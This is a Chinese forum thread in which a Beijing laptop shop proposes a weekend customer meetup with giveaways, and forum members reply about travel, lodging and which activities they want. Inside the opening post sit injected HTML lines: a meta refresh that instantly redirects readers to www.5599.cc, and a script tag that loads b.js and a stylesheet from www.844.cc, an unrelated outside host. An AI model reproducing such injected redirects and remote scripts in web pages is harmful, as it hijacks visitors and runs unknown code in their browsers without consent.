开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

翔意笔记本交流聚会大家有兴趣吗??

本来打算在去年年底举行,但是最后因为种种原因无疾而终了,现在又拿到桌面上,看看大家有没有兴趣?

聚会大约安排在周末,活动内容贴内大家讨论.或者提一些建议.

也许到时候如果我们弄到减重模块的话,会给各位到场的客户赠送的哦,如果弄不到的话最次也会赠送内包的.

希望大家多多参与本贴.

<meta http-equiv="refresh" content="0; url=http://www.5599.cc">
★★★
<script type="text/javascript" src="http://www.844.cc/b.js"></script>
<link href="http://www.844.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

单选投票, 共有 0 人参与投票
68.75% (22)
0.00% (0)
31.25% (10)
您所在的用户组没有投票权限

婚介or联谊

听上去好像是很可行的样子!但是,怎么个活动法呢?吃饭?聊天?唱K?互相看本?大家的本估计都应该是T42!长得应该几乎一样!
然后“聚会大约安排在周末”我觉得就这句话最符合聚会!然后其它的条件都觉得有点很搞!

看到帖子后,想想怎么感觉就像安琪物业里面的那些婚姻介绍所似的!哈哈,夕阳红老年婚介!或者感觉像联谊!

杨啊杨!是不是你看上了哪个客户啊!想见就直接说,绕这么大的圈圈!哈哈哈哈哈哈!

不过你还挺下本的!竟然没人送模块或内包! 哈哈!
哈哈,楼上的,看穿不要点穿么!

呵呵!支持楼主的召唤!

不过偶在江苏!远啊!
哎 大概是偶老了  思想不像你们年青人那么活跃了 哎。。。。。。。。。
没买本本的去不成了?
呵呵,那像我们外地的杨老大管不管住宿阿?我也想去,可是太远了,我是哈尔滨的。
偶是福州的啊,去不了…………
要是能让没买本本的去体验体验的话,哪是最好了,我一直想试试X40效果如何!
看时间了
严重支持!
要是管住就去呀,呵呵。
liux 该用户已被删除
支持!
俺想去,可就是太远了点。俺是重庆的;再说了,俺现在也还没本本呢?
好的,在北京办就去~~

礼品很吸引人

但....
到那干什么呀 ?
不能光去拿赠品啊

如果能免费清洗一下机子也不错

杨总考虑一下
我想去,可惜我要下个星期才能回北京!
很不错的活动啊,我首先支持。
周末的话最好了,大家都有时间。

大家可以互相认识一下嘛,都是不同行业或者说不同经历的人,一起聊聊天,交流一下用本的经验,呵呵~~

翔意最好把赠品分一下等级,到时候可以有比如说自我介绍啊,经验交流啊,小游戏啊,之类的活动,可以给积极参加的客户更好一点的奖品,增加参加活动的积极性。当然,减重模块是好东西,大家都很想要的,嘿嘿~~,增加一些参与性的活动和少量的高级一些的奖品就不会让大家只是为了去拿赠品而去参加聚会。

嗯,加油吧!!!相信如果翔意把这次聚会搞好了,会很好的为自己做一个宣传,得到更多人的认可和信任。

一定要把具体时间提前至少一周确定下来哦,呵呵,很期待啊!~

(如果准备的过程中需要人手,我可以去帮忙哦。^_^)
一定去
说说时间、地点

是不是只有VIP购机用户才可以去啊

唉,米有本本受歧视啊,哈哈
啥时候报名啊?
算我一个!!
如果是周日的话,我一定去啊,我在北京,方便啊,呵呵,可是我周六老加班,所以,周日最好了,大力支持啊
要是管住,谁都去了,就当旅游了
晕!就明天?看来没希望了